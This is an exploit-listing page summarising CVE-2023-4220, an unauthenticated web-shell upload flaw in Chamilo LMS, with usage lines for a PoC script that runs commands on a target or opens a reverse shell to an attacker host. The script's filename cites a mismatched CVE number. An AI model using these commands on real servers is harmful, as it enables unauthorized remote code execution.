Exploit for Unrestricted Upload of File with Dangerous Type in Chamilo Chamilo Lms exploit

Share

## https://sploitus.com/exploit?id=6E720285-8B1A-5387-A0A4-4C631410182E # CVE-2023-4220 POC More about CVE-2023-4220: [StarLabs Advisory](https://starlabs.sg/advisories/23/23-4220/) ## Summary | **Product** | Chamilo | | ------------------------ | ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | | **Vendor** | Chamilo | | **Severity** | High - Adversaries may exploit software vulnerabilities to obtain unauthenticated remote code execution. | | **Affected Versions** | <= v1.11.24 | | **Tested Versions** | v1.11.24 (latest version as of writing) | | **CVE Identifier** | CVE-2023-4220 | | **CVE Description** | Unrestricted file upload in big file upload functionality in `/main/inc/lib/javascript/bigupload/inc/bigUpload.php` in Chamilo LMS <= v1.11.24 allows unauthenticated attackers to perform stored cross-site scripting attacks and obtain remote code execution via uploading of web shell. | | **CWE Classification** | CWE-434: Unrestricted Upload of File with Dangerous Type | | **CAPEC Classification** | CAPEC-650: Upload a Web Shell to a Web Server | ## Proof of Concept (PoC) ### Execute Commands Directly To execute commands directly, use the following command: `python CVE-2023-4226.py -u http://<target_ip>:<target_port> -c whoami` ### Obtain a Reverse Shell To obtain a reverse shell, use the following command: `python CVE-2023-4226.py -u http://<target_ip>:<target_port> -lhost <local_ip> -lport <local_port>`